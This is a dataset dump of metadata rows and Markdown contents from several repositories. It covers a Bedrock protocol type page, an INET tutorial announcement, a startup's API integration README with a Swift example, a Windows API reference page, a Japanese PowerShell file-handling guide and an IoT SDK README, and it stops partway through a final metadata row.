hexsha stringlengths 40 40 | size int64 5 1.04M | ext stringclasses 6 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 344 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 11 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 344 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 11 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 344 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 11 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 1.04M | avg_line_length float64 1.14 851k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 | lid stringclasses 191 values | lid_prob float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
edeff00c7e252748ec1c75c1d8900cf66525e5c2 | 611 | md | Markdown | protocol/bedrock201/types/inventory-action.md | soupply/soupply.github.io | c04ea029199798c7a77c091bd45aec0494316ac9 | [
"MIT"
] | null | null | null | protocol/bedrock201/types/inventory-action.md | soupply/soupply.github.io | c04ea029199798c7a77c091bd45aec0494316ac9 | [
"MIT"
] | null | null | null | protocol/bedrock201/types/inventory-action.md | soupply/soupply.github.io | c04ea029199798c7a77c091bd45aec0494316ac9 | [
"MIT"
] | null | null | null | ---
layout: default
---
[home](/) / [bedrock201](/protocol/bedrock201) / [types](/protocol/bedrock201/types) / inventory-action
# Inventory action
## Fields
Name | Type | When | Default
---|---|:---:|:---:
[source](#source) | varuint | |
container | varint | <code>source</code> is equal to <code>0</code> | -1
? | varuint | <code>source</code> is equal to <code>2</code> |
slot | varuint | |
old item | [slot](/protocol/bedrock201/types/slot) | |
new item | [slot](/protocol/bedrock201/types/slot) | |
### source
**Constants**:
Name | Value
---|:---:
container | 0
world | 2
creative | 3
| 21.068966 | 109 | 0.605565 | eng_Latn | 0.307785 |
edf0b1d49c6fae0ac5e1f3dcb780c8eb707331ea | 984 | md | Markdown | _posts/2017-09-15-ipv4configurator-tutorial-released.md | inet-framework/inet-framework.github.io | bd12727e0b56b56961b8b229cd00187403c57f56 | [
"CC0-1.0"
] | 1 | 2019-09-16T17:19:14.000Z | 2019-09-16T17:19:14.000Z | _posts/2017-09-15-ipv4configurator-tutorial-released.md | inet-framework/inet-framework.github.io | bd12727e0b56b56961b8b229cd00187403c57f56 | [
"CC0-1.0"
] | 1 | 2016-03-15T13:45:09.000Z | 2016-03-15T14:26:05.000Z | _posts/2017-09-15-ipv4configurator-tutorial-released.md | inet-framework/inet-framework.github.io | bd12727e0b56b56961b8b229cd00187403c57f56 | [
"CC0-1.0"
] | null | null | null | ---
layout: post
title: IPv4 Network Configurator Tutorial Released
category: news
---
How to configure IPv4 addresses and routing tables in an INET simulation
is a recurring question on the mailing list. It is not always trivial
how to use INET's netwok configurator for various types of networks,
and how to incorporate special requirements. Therefore, we are particularly happy
to report that we have completed the writing of the
*IPv4 Network Configurator Tutorial*, and it has been made available
on the INET site. We hope that the tutorial will be useful, and help
users get the most of out INET.
If you spot errors in the tutorial or have other feedback, you can
enter your comments by following the "Discussion" links found in the
tutorial pages themselves. If you wish to contribute, you can do so
by submitting pull requests against the `inet-tutorials` repository.
Links:
* [IPv4 Network Configurator Tutorial](https://inet.omnetpp.org/docs/tutorials/configurator/doc/)
| 42.782609 | 97 | 0.79878 | eng_Latn | 0.9994 |
edf1333a769b646341a2a648eaf108eb989b693b | 12,189 | md | Markdown | README.md | NoImpactNoIdea/getupsell.com-documentation | ab5dcdc03b95d4e3cab6f27bdde3f791b48c927d | [
"Apache-2.0"
] | null | null | null | README.md | NoImpactNoIdea/getupsell.com-documentation | ab5dcdc03b95d4e3cab6f27bdde3f791b48c927d | [
"Apache-2.0"
] | null | null | null | README.md | NoImpactNoIdea/getupsell.com-documentation | ab5dcdc03b95d4e3cab6f27bdde3f791b48c927d | [
"Apache-2.0"
] | null | null | null |
# DO NOT SHARE NOTICE:
> This is a **living developer guide** that will undergo multitudinous modifications/adjustments as development progresses. All commits/pushes/modifications are recognized by the contributing author and attributed as applicable. Since this software **IS PROPRIETARY**, this document will **NOT BE SHARED** unless authorization is warranted from Brantley Pace (CEO) and/or JJ McMillen (Creative). **NO EXCEPTIONS** are authorized.
>
# Approved Editors:
* Brantely pace, CEO
* JJ McMillen, Creative
* Charles Arcodia, CTO
* Sam Blount, AE
# Overview: Project getupsell.com
* Empower your revenue generating teams to become product experts with intuitive analytics insights, intelligently organized into tasks. Know your customers' needs before they do.
* Traditionally, Account Executives have very little visibility on how customers are using their products. Because of that, companies sell less than they could and customers are left with “just checking in emails.” Our mission is to help companies grow existing business by empowering their sales teams with product usage insights.
# Living Overview and key Fundamentals (Google Doc Overview)
https://docs.google.com/document/d/1oZd0UF7xCtHNjL666cglS_HRMJAUVVgwSerWU5AkCls/edit
# Source/Version Control
* GitHub (Preferred)
# Website
* https://www.getupsell.com
# Accompanying links for development and references
* https://console.firebase.google.com/u/0/
* https://nodejs.org/en/
* https://code.visualstudio.com
* https://atom.io
* https://gdpr-info.eu
* https://firebase.google.com/docs/storage
# Primary Development Machine
* iMac Pro - Big Sur V 11.1
* Processor 3.2 GHz 8-Core Intel Xenon W
* Memory 32 GB 2666 MHz DDR4
* Graphics Radeon Pro Vega 56 8 GB
# Backend IDE/Syntax
* Visual Studio Code/Atom IDE's
* Node.JS - https://nodejs.org/en/
* JavaScript
* Firebase Database
* Firebase Storage
* Firebase HTTPS Cloud Functions
* Heroku - https://dashboard.heroku.com/apps
* Mongo Database - https://www.mongodb.com
# 3rd Party Frameworks (Subject to change as necessary)
* Express
* Morgan
* Firebase Storage
* Firebase Database
* Mongo DB (Database)
# GDPR (General Data Protection Regulation) and pertatining rules for development
> GDPR is responsible for data security and protecting the end users. Since the penalties for non-conformity is high, please read through the guidelines @ https://gdpr-info.eu for further understanding. The General Data Protection Regulation (GDPR) is the toughest privacy and security law in the world. Though it was drafted and passed by the European Union (EU), it imposes obligations onto organizations anywhere, so long as they target or collect data related to people in the EU. The regulation was put into effect on May 25, 2018. The GDPR will levy harsh fines against those who violate its privacy and security standards, with penalties reaching into the tens of millions of euros.
> With the GDPR, Europe is signaling its firm stance on data privacy and security at a time when more people are entrusting their personal data with cloud services and breaches are a daily occurrence. The regulation itself is large, far-reaching, and fairly light on specifics, making GDPR compliance a daunting prospect, particularly for small and medium-sized enterprises (SMEs).
# Deebly Integration START (2 Signals)
**URL for Testing**
https://salty-savannah-91118.herokuapp.com
# Endpoint
/deebly_signals
# Complete URL
https://salty-savannah-91118.herokuapp.com/deebly_signals
# Headers
application/json Content-Type
application/json Accept
# HTTP Method
POST
# Deebly integration requires 3 keys to be integrated into the Deebly platform.
> First key (new_client_registration): Triggered when a new client registers for the Deebly platform.
> Second key (new_client_paid_plan): Triggered when a new client engages a paid plan.
> Third key (client_total_spend_increase): Triggered when a new client moves money to the Deebly platform.
> Every parameter is of type 'string' except for is_development_key is of type bool.
1. new_client_registration (Place API call into the function that registers new users into the Deebly platform)
**required parameters
"admin_key" : "Grab this from the dashboard - endpoint /developer_keys under Keys/Development",
"is_development_key": Set this to true, as BETA will take place under development,
"type_of_key" : "new_client_registration",
"bdr_user_uid" : "This is the Business Development Reps unique UID stored in the Deebly Database - for example, Barry's UID",
"bdr_client_uid" : "This is the Business Development Reps client unique UID stored in the Deebly Database",
"bdr_client_email" : "This is the Business Development Reps client's email
2. new_client_paid_plan (Place API call into the function that registers the client for a paid service)
**required parameters
"admin_key" : "Grab this from the dashboard - endpoint /developer_keys under Keys/Development",
"is_development_key": true,
"type_of_key" : "new_client_paid_plan",
"bdr_user_uid" : "This is the Business Development Reps unique UID stored in the Deebly Database - for example, Barry's UID",
"bdr_client_uid" : "This is the Business Development Reps client unique UID stored in the Deebly Database",
"bdr_client_email" : "This is the Business Development Reps client's email,
"type_of_paid_plan" : "The name of the registered plan the user signed up for"
3. client_total_spend_increase (Place API call into the function that moves money on behalf of the client)
**required parameters
"admin_key" : "Grab this from the dashboard - endpoint /developer_keys under Keys/Development",
"is_development_key": true,
"type_of_key" : "client_total_spend_increase",
"bdr_user_uid" : "This is the Business Development Reps unique UID stored in the Deebly Database - for example, Barry's UID",
"bdr_client_uid" : "This is the Business Development Reps client unique UID stored in the Deebly Database",
"bdr_client_email" : "This is the Business Development Reps client's email,
"type_of_paid_plan" : "The name of the registered plan the user signed up for",
"client_total_spend" : "Place the monetary value that the client pays everytime a payment is made"
# Deebly Integration END (2 Signals)
# Product Integration
> With Upsells API, users can manage tasks using simple HTTPS rest calls with preset parameters depending on the needs of the organization for global API access.
> For clarity, our REST API is designed and patterned using HTTP protocol.
> For HTTP basic authentication and communication with the Upsell servers, users will provide bare minimum credentials such as their Company Email along with > their Phone number. From here, an account is created with the appropriate development/production keys to access our systems.
> From here, developers will implement HTTP calls to dev.getupsell.com along with the appropriate parameters. As an example, the average logo requires 5 keys (5 > API Calls) with an integration time of under 1 hour.
> After integration, the Admin can assign user credentials, rotate API keys and conduct task management. The BDR’s will follow their Upsell tasks accordingly and > archive when necessary.
> Please refer to an example implementation of an HTTP call using Swift.
# iOS Swift Singleton Example
import Foundation
class Service : NSObject {
static let shared = Service()
func upsellPostRequest(admin_key: String, is_development_key: Bool, type_of_key : String, completion: @escaping ([String: Any]?, Error?) -> Void) {
let parameters : [String : Any] = ["admin_key": admin_key, "is_development_key": is_development_key, "type_of_key" : type_of_key]
let slug = "targeted_request_key"
let url = URL(string: "https://salty-savannah-91118.herokuapp.com/\(slug)")!
let session = URLSession.shared
var request = URLRequest(url: url)
request.httpMethod = "POST"
do {
request.httpBody = try JSONSerialization.data(withJSONObject: parameters, options: .prettyPrinted) // pass dictionary to data object and set it as request body
} catch let error {
print(error.localizedDescription)
completion(nil, error)
}
request.addValue("application/json", forHTTPHeaderField: "Content-Type")
request.addValue("application/json", forHTTPHeaderField: "Accept")
let task = session.dataTask(with: request, completionHandler: { data, response, error in
guard error == nil else {
completion(nil, error)
return
}
guard let data = data else {
completion(nil, NSError(domain: "dataNilError", code: -100001, userInfo: nil))
return
}
do {
guard let json = try JSONSerialization.jsonObject(with: data, options: .mutableContainers) as? [String: Any] else {
completion(nil, NSError(domain: "invalidJSONTypeError", code: -100009, userInfo: nil))
return
}
completion(json, nil)
} catch let error {
print(error.localizedDescription)
completion(nil, error)
}
})
task.resume()
}
}
# Developer and Integration Guide (HTTPS and REST API for Logo Integration)
**URLS for Testing and Production**
* Development URL : https://dev.getupsell.com/
* Production URL : https://prod.getupsell.com/
**Endpoints:**
* /company_authentication
* /manage_users
**company_authentication**
*The first time a company/logo integrates getupsell with their current platform, company_authentication needs to be called with the following parameters:*
*String*
* type_of_request
* email
* password
* displayName
* sign_up_date
* user_uid
- type_of_request can either be: "registration" || "registration_database_update"
**registration**
* type_of_request
* email
* password
* displayName
**registration_database_update**
* type_of_request
* email
* sign_up_date
* user_uid
**manage_users**
* companyUID
* user_UID
* user_first_name
* user_last_name
# How to get the Development and Production Keys
1. Make a company account @ app.getupsell.com
* Company Name
* Company Email
* Password
2. Hover over Developer Portal
* Select Developer Keys
* Make a secure copy of the Developer/Production Keys (60 character string)
# Developer Portal
* Dev and Prod Keys
* Access to development logs and permissions
* Correlated Tasks for the correct user
**STACK**
Plain and Vanilla HTML
Javascript
Database Connectivity - MongoDB and Firebase
# Developer Guide Creator and Licensing: Monday May 10th, 2021
**Project Manager/Salesforce Developer**
* Project Manager: Brantley Pace
* LinkedIn: https://www.linkedin.com/in/brantley-pace/
* Email: brantley@getupsell.com
* Education: MBA
**CREATIVE**
* Design/UI/UX: JJ McMillen
* Email: jennifer@getupsell.com
* LinkedIn: https://www.linkedin.com/in/jennifer-mcmillen/
* Education: Masters of Art, Design for Sustainability
**Chief Technology Officer**
* CTO/Developer: Charles Arcodia
* Email: charliearcodia@gmail.com
* LinkedIn: https://www.linkedin.com/in/charlie-arcodia-5b7898114/
* Education: MBA/CS
* Languages: C#, C++, JavaScript, Swift, Kotlin
**Account Executive**
* AE: Sam Blount
* Email: sam@getupsell.com
* LinkedIn: https://www.linkedin.com/in/samblount/
# Licensing for Source Control
* License: APACHE LICENSE, VERSION 2.0 (2004) - https://www.apache.org/licenses/LICENSE-2.0.html
| 38.451104 | 690 | 0.710231 | eng_Latn | 0.901096 |
edf1a1511cfd0211f3f7e0687afc9738508c5d10 | 2,609 | md | Markdown | desktop-src/TSF/isoftkbd-getsoftkeyboardtypemode.md | KrupalJoshi/win32 | f5099e1e3e455bb162771d80b0ba762ee5c974ec | [
"CC-BY-4.0",
"MIT"
] | null | null | null | desktop-src/TSF/isoftkbd-getsoftkeyboardtypemode.md | KrupalJoshi/win32 | f5099e1e3e455bb162771d80b0ba762ee5c974ec | [
"CC-BY-4.0",
"MIT"
] | null | null | null | desktop-src/TSF/isoftkbd-getsoftkeyboardtypemode.md | KrupalJoshi/win32 | f5099e1e3e455bb162771d80b0ba762ee5c974ec | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: ISoftKbd GetSoftKeyboardTypeMode method
description: The ISoftKbd GetSoftKeyboardTypeMode method retrieves the type mode for a soft keyboard.
ms.assetid: 77294652-b82e-4b69-bb55-5ebebc3c97c7
keywords:
- GetSoftKeyboardTypeMode method Text Services Framework
- GetSoftKeyboardTypeMode method Text Services Framework , ISoftKbd interface
- ISoftKbd interface Text Services Framework , GetSoftKeyboardTypeMode method
topic_type:
- apiref
api_name:
- ISoftKbd.GetSoftKeyboardTypeMode
api_location:
- Softkbd.dll
api_type:
- COM
ms.topic: reference
ms.date: 05/31/2018
---
# ISoftKbd::GetSoftKeyboardTypeMode method
The **ISoftKbd::GetSoftKeyboardTypeMode** method retrieves the type mode for a soft keyboard.
## Syntax
```C++
HRESULT GetSoftKeyboardTypeMode(
[out] TYPEMODE *lpTypeMode
);
```
## Parameters
<dl> <dt>
*lpTypeMode* \[out\]
</dt> <dd>
Pointer to a buffer in which this method retrieves the type mode. Possible values are defined for the [**TYPEMODE**](typemode.md) enumeration.
</dd> </dl>
## Return value
This method can return one of these values.
| Value | Description |
|----------------------------------------------------------------------------------------------|---------------------------------------------------|
| <dl> <dt>**S\_OK**</dt> </dl> | The method was successful.<br/> |
| <dl> <dt>**E\_INVALIDARG**</dt> </dl> | The *lpTypeMode* parameter is invalid.<br/> |
## Requirements
| | |
|-------------------------------------|----------------------------------------------------------------------------------------|
| Minimum supported client<br/> | Windows 2000 Professional \[desktop apps only\]<br/> |
| Minimum supported server<br/> | Windows 2000 Server \[desktop apps only\]<br/> |
| Redistributable<br/> | TSF 1.0 on Windows 2000 Professional<br/> |
| Header<br/> | <dl> <dt>Softkbdc.h</dt> </dl> |
| IDL<br/> | <dl> <dt>Softkbd.idl</dt> </dl> |
| DLL<br/> | <dl> <dt>Softkbd.dll</dt> </dl> |
## See also
<dl> <dt>
[**ISoftKbd**](isoftkbd.md)
</dt> <dt>
[**ISoftKbd::SetSoftKeyboardTypeMode**](isoftkbd-setsoftkeyboardtypemode.md)
</dt> <dt>
[**TYPEMODE**](typemode.md)
</dt> </dl>
| 26.622449 | 148 | 0.508241 | yue_Hant | 0.457958 |
edf1a7ae8b50c7146c638b5cdab8750dccc1bdf7 | 5,004 | md | Markdown | scripting/getting-started/cookbooks/Working-with-Files-and-Folders.md | I-Cat/PowerShell-Docs.ja-jp | d62d477477f3e66269cbc8c7225499629d4eff02 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2016-03-08T06:52:43.000Z | 2019-01-16T06:04:51.000Z | scripting/getting-started/cookbooks/Working-with-Files-and-Folders.md | I-Cat/PowerShell-Docs.ja-jp | d62d477477f3e66269cbc8c7225499629d4eff02 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | scripting/getting-started/cookbooks/Working-with-Files-and-Folders.md | I-Cat/PowerShell-Docs.ja-jp | d62d477477f3e66269cbc8c7225499629d4eff02 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-04-05T00:12:43.000Z | 2021-04-05T00:12:43.000Z | ---
title: "ファイルとフォルダーの操作"
ms.date: 2016-05-11
keywords: "PowerShell, コマンドレット"
description:
ms.topic: article
author: jpjofre
manager: dongill
ms.prod: powershell
ms.assetid: c0ceb96b-e708-45f3-803b-d1f61a48f4c1
translationtype: Human Translation
ms.sourcegitcommit: a656ec981dc03fd95c5e70e2d1a2c741ee1adc9b
ms.openlocfilehash: c3f7c226fcb496e5bb51ba601429c54b43de9d52
---
# ファイルとフォルダーの操作
Windows PowerShell ドライブ間を移動したり、Windows PowerShell ドライブ上の項目を操作したりすることは、Windows の物理ディスク ドライブ上のファイルやフォルダーを操作することと似ています。 このセクションでは、ファイルとフォルダーを操作するための特定のタスクの処理方法について説明します。
### フォルダー内のすべてのファイルとフォルダーの一覧表示
**Get-ChildItem** を使用することにより、フォルダー内のすべての項目を直接取得することができます。 非表示の項目やシステム項目を表示するには、オプションの **Force** パラメーターを追加します。 たとえば、このコマンドは、Windows PowerShell ドライブ C (Windows の物理ドライブ C と同じ) に直接含まれるコンテンツを表示します。
```
Get-ChildItem -Force C:\
```
このコマンドは、Cmd.exe の **DIR** コマンドや UNIX シェルの **ls** を使用したときと同様に、直接含まれている項目のみを一覧表示します。 内包されている項目を表示するには、**Recurse** パラメーターも指定する必要があります。 (完了までにかなりの時間がかかることがあります。)C ドライブ上のすべての項目を一覧表示するには、次のように入力します。
```
Get-ChildItem -Force C:\ -Recurse
```
**Get-ChildItem** は、**Path**、**Filter**、**Include**、**Exclude** の各パラメーターを使用して項目をフィルター処理できますが、通常、これらは名前にのみ基づいています。 **Where-Object** を使用することにより、項目の他のプロパティに基づいた複雑なフィルター処理を実行できます。
次のコマンドは、Program Files フォルダー内にある、2005 年 10 月 1 日より後に最終更新され、1 メガバイト以上、10 メガバイト以下のすべての実行可能ファイルを検出します。
```
Get-ChildItem -Path $env:ProgramFiles -Recurse -Include *.exe | Where-Object -FilterScript {($_.LastWriteTime -gt "2005-10-01") -and ($_.Length -ge 1m) -and ($_.Length -le 10m)}
```
### ファイルとフォルダーのコピー
コピーは **Copy-Item** を使用して行われます。 次のコマンドは、C:\boot.ini を C:\boot.bak にバックアップします。
```
Copy-Item -Path c:\boot.ini -Destination c:\boot.bak
```
コピー先のファイルが既に存在する場合、コピー操作は失敗します。 既存のコピー先ファイルを上書きするには、Force パラメーターを使用します。
```
Copy-Item -Path c:\boot.ini -Destination c:\boot.bak -Force
```
このコマンドは、コピー先が読み取り専用である場合にも使用できます。
フォルダーのコピーも同様に動作します。 次のコマンドでは、フォルダー C:\temp\test1 を新しいフォルダー c:\temp\DeleteMe に再帰的にコピーします。
```
Copy-Item C:\temp\test1 -Recurse c:\temp\DeleteMe
```
選択した項目をコピーすることもできます。 次のコマンドでは、c:\data 内の任意の場所に格納されているすべての .txt ファイルを c:\temp\text にコピーします。
```
Copy-Item -Filter *.txt -Path c:\data -Recurse -Destination c:\temp\text
```
ファイル システムのコピー操作には、他のツールを使用することもできます。 XCOPY、ROBOCOPY、および COM オブジェクト (**Scripting.FileSystemObject** など) はすべて Windows PowerShell で動作します。 たとえば、Windows Script Host の **Scripting.FileSystem COM** クラスを使用して、C:\boot.ini を C:\boot.bak にバックアップするには、次のように入力します。
```
(New-Object -ComObject Scripting.FileSystemObject).CopyFile("c:\boot.ini", "c:\boot.bak")
```
### ファイルとフォルダーの作成
新しい項目の作成は、すべての Windows PowerShell プロバイダーで同じ方法で行われます。 Windows PowerShell プロバイダーに複数の種類の項目が含まれている場合 (たとえば、FileSystem Windows PowerShell プロバイダーではディレクトリとファイルが区別されます)、項目の種類を指定する必要があります。
次のコマンドでは、フォルダー C:\temp\New Folder が新規作成されます。
```
New-Item -Path 'C:\temp\New Folder' -ItemType "directory"
```
次のコマンドでは、空のファイル C:\temp\New Folder\file.txt が新規作成されます。
```
New-Item -Path 'C:\temp\New Folder\file.txt' -ItemType "file"
```
### フォルダー内のすべてのファイルとフォルダーの削除
内包されている項目を削除するには、**Remove-Item** を使用します。ただし、その項目に他の何らかの項目が含まれている場合、削除の確認を求められます。 たとえば、他の項目を含むフォルダー C:\temp\DeleteMe を削除しようとすると、フォルダーが削除される前に、Windows PowerShell から次のような削除の確認メッセージが表示されます。
```
Remove-Item C:\temp\DeleteMe
Confirm
The item at C:\temp\DeleteMe has children and the -recurse parameter was not
specified. If you continue, all children will be removed with the item. Are you
sure you want to continue?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help
(default is "Y"):
```
内包されている項目ごとに削除の確認が行われないようにする場合は、**Recurse** パラメーターを使用します。
```
Remove-Item C:\temp\DeleteMe -Recurse
```
### Windows のアクセス可能なドライブとしてのローカル フォルダーのマッピング
**subst** コマンドを使用することにより、ローカル フォルダーをマッピングすることもできます。 次のコマンドは、ローカルの Program Files ディレクトリをルートとするローカル ドライブ P: を作成します。
```
subst p: $env:programfiles
```
ネットワーク ドライブと同様に、**subst** を使用して Windows PowerShell 内でマッピングされたドライブは、直ちに Windows PowerShell シェルに表示されます。
### 配列へのテキスト ファイルの読み込み
テキスト データの一般的な格納形式の 1 つに、個々の行を個別のデータ要素として扱うファイルを使用する方法があります。 **Get-Content** コマンドレットを使用することにより、1 つのステップでファイル全体を読み取ることができます。以下にその例を示します。
```
PS> Get-Content -Path C:\boot.ini
[boot loader]
timeout=5
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"
/noexecute=AlwaysOff /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=" Microsoft Windows XP Professional
with Data Execution Prevention" /noexecute=optin /fastdetect
```
**Get-Content** は、ファイルから読み取ったデータを、1 行のファイル内容につき 1 つの要素を含む配列として扱います。 これを確認するには、返された内容の **Length** をチェックします。
```
PS> (Get-Content -Path C:\boot.ini).Length
6
```
このコマンドは、情報の一覧を Windows PowerShell に直接取得するときに最も役立ちます。 たとえば、コンピューター名または IP アドレスの一覧を、ファイルの各行に 1 つの名前を入力して C:\temp\domainMembers.txt ファイルに保存できます。 **Get-Content** を使用してファイルの内容を取得し、変数 **$Computers** に格納するには、次のように入力します。
```
$Computers = Get-Content -Path C:\temp\DomainMembers.txt
```
**$Computers** には、各要素に 1 つのコンピューター名が含まれた配列が格納されます。
<!--HONumber=Oct16_HO1-->
| 32.493506 | 249 | 0.773381 | yue_Hant | 0.826133 |
edf1b960dd9c8afa85fcef274411eaacb39b7caf | 2,378 | md | Markdown | components/linksdk/README.md | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | 4,538 | 2017-10-20T05:19:03.000Z | 2022-03-30T02:29:30.000Z | components/linksdk/README.md | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | 1,088 | 2017-10-21T07:57:22.000Z | 2022-03-31T08:15:49.000Z | components/linksdk/README.md | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | 1,860 | 2017-10-20T05:22:35.000Z | 2022-03-27T10:54:14.000Z | @page linksdk linksdk
[更正文档](https://gitee.com/alios-things/linksdk/edit/master/README.md)      [贡献说明](https://help.aliyun.com/document_detail/302301.html)
# 概述
Link SDK由阿里云提供给设备厂商,由设备厂商集成到设备上后通过该SDK将设备安全地接入到阿里云IoT物联网平台,继而让设备可以被阿里云IoT物联网平台进行管理。设备需要支持TCP/IP协议栈才能集成Link SDK。另外Zigbee、433、KNX这样的非IP设备需要通过网关设备接入到阿里云IoT物联网平台,网关设备需要集成Link SDK。
说明:Link SDK以前名称为Link Kit SDK,现更名为Link SDK。
该组件支持以下功能:
- MQTT连云
- HTTP连云
- 设备认证
- 物模型
- 时间同步
- RRPC
- 设备连接异常告警
- 日志上报
- 设备引导服务
- 子设备管理
- 设备诊断
- OTA(在AliOS THings场景建议使用OS自带OTA)
更多详情,请参考阿里云Link SDK[说明文档](https://help.aliyun.com/document_detail/163755.html?spm=a2c4g.11186623.6.558.38557748p9kUy6) 。
## 版权信息
> Apache 2.0 License
## 目录结构
```tree
.
├── ChangeLog.md #变更日志
├── components
│ ├── bootstrap #设备引导服务
│ ├── data-model #物模型
│ ├── devinfo #设备信息
│ ├── diag #设备诊断
│ ├── dynreg #基于HTTP动态注册
│ ├── dynreg-mqtt #基于MQTT的动态注册
│ ├── logpost #日志上报
│ ├── ntp #ntp时间
│ ├── ota #ota功能
│ ├── shadow #设备影子
│ └── subdev #子设备
├── core
│ ├── aiot_http_api.c #HTTP核心api实现
│ ├── aiot_http_api.h #HTTP对外头文件
│ ├── aiot_mqtt_api.c #MQTT核心api实现
│ ├── aiot_mqtt_api.h #MQTT对外头文件
│ ├── aiot_state_api.c #状态码
│ ├── aiot_state_api.h #状态码头文件
│ ├── aiot_sysdep_api.h #系统相关头文件
│ ├── README.md
│ ├── sysdep #系统相关实现
│ └── utils #工具类接口
├── external
│ ├── ali_ca_cert.c #cert证书
│ └── README.md
├── package.yaml #编译文件
├── portfiles
│ ├── aiot_port #AliOS Things适配层
│ └── README.md
└── README.md
```
## 依赖组件
* osal_aos
* cjson
* mbedtls
# 常用配置
无
# API说明
请参考阿里云Link SDK[编程手册](https://help.aliyun.com/document_detail/163764.html?spm=a2c4g.11186623.6.568.3d00316fqDi9YJ)。
# 使用示例
solutions中提供了以下demo供用户选择使用:
- [link_sdk_demo 物模型单品用例](https://g.alicdn.com/alios-things-3.3/doc/linksdk_demo.html)
- [link_sdk_gateway_demo 物模型网关代理子设备上云用例](https://g.alicdn.com/alios-things-3.3/doc/linksdk_gateway_demo.html)
## 添加组件
默认仅使能能物模型及网关子设备功能。如需编译其他功能,请在package.yaml中包含对应的头文件路径及源码编译路径。如需使能动态注册:
```yaml
source_file:
- "components/dynreg/*.c"
include:
- components/dynreg
```
# FAQ
常见问题可参考阿里云官网设备接入[常见问题](https://help.aliyun.com/document_detail/96598.html?spm=a2c4g.11186623.6.554.2042557fWpe2Ps)。
| 24.020202 | 175 | 0.643398 | yue_Hant | 0.816881 |
edf1c8fc649896fa4b5a355c0b2a3612e280c68e | 74 | md | Markdown | README.md | CompuMasterGmbH/CompuMaster.Web.TinyWebServerAdvanced | 1e2d224bc15daeda1335386c064b5ba215e0227c | [
"MIT"
] | null | null | null | README.md | CompuMasterGmbH/CompuMaster.Web.TinyWebServerAdvanced | 1e2d224bc15daeda1335386c064b5ba215e0227c | [
"MIT"
] | null | null | null | README.md | CompuMasterGmbH/CompuMaster.Web.TinyWebServerAdvanced | 1e2d224bc15daeda1335386c064b5ba215e0227c | [
"MIT"
] | null | null | null | # CompuMaster.Web.TinyWebServerAdvanced
CompuMaster TinyWebServerAdvanced
| 24.666667 | 39 | 0.905405 | yue_Hant | 0.310218 |
edf1cc4b4eb0f181a0a56c30b224ce9406b3467c | 210 | md | Markdown | ANDROID_FINGERPRINT_RECOGNITION.md | snpmyn/OpenSourceCollection | e455603f513bf49d3d90aadff114a784ed495f87 | [
"Apache-2.0"
] | 4 | 2020-01-17T04:31:18.000Z | 2020-06-15T11:35:17.000Z | ANDROID_FINGERPRINT_RECOGNITION.md | snpmyn/OpenSourceCollection | e455603f513bf49d3d90aadff114a784ed495f87 | [
"Apache-2.0"
] | null | null | null | ANDROID_FINGERPRINT_RECOGNITION.md | snpmyn/OpenSourceCollection | e455603f513bf49d3d90aadff114a784ed495f87 | [
"Apache-2.0"
] | null | null | null | * [BiometricPrompt](https://github.com/ZuoHailong/BiometricPrompt)
* [soter](https://github.com/Tencent/soter)
A secure and quick biometric authentication standard and platform in Android held by Tencent. | 52.5 | 97 | 0.780952 | eng_Latn | 0.437135 |
edf1d852ac4bee9ce464a15eb9c571660dbeffda | 75 | md | Markdown | README.md | ipiao/apns2 | 994350cdb30ee5644e22fe8be1639b9935b08f93 | [
"MIT"
] | null | null | null | README.md | ipiao/apns2 | 994350cdb30ee5644e22fe8be1639b9935b08f93 | [
"MIT"
] | null | null | null | README.md | ipiao/apns2 | 994350cdb30ee5644e22fe8be1639b9935b08f93 | [
"MIT"
] | null | null | null | # APNS/2
- fork form github.com/sideshow/apns2
- 添加了消息体参数 cmd
- 修改方法 Badge | 15 | 37 | 0.733333 | yue_Hant | 0.162648 |
edf2d2d703daffda282cc7729aa7624f7c73e2ad | 44,680 | md | Markdown | microsoft-365/compliance/encryption-sensitivity-labels.md | MicrosoftDocs/microsoft-365-docs-pr.nl-NL | 6e5ca6bfc9713df2e28347bd1ca1c86d38113afb | [
"CC-BY-4.0",
"MIT"
] | 4 | 2020-05-18T20:11:39.000Z | 2022-01-29T01:34:41.000Z | microsoft-365/compliance/encryption-sensitivity-labels.md | MicrosoftDocs/microsoft-365-docs-pr.nl-NL | 6e5ca6bfc9713df2e28347bd1ca1c86d38113afb | [
"CC-BY-4.0",
"MIT"
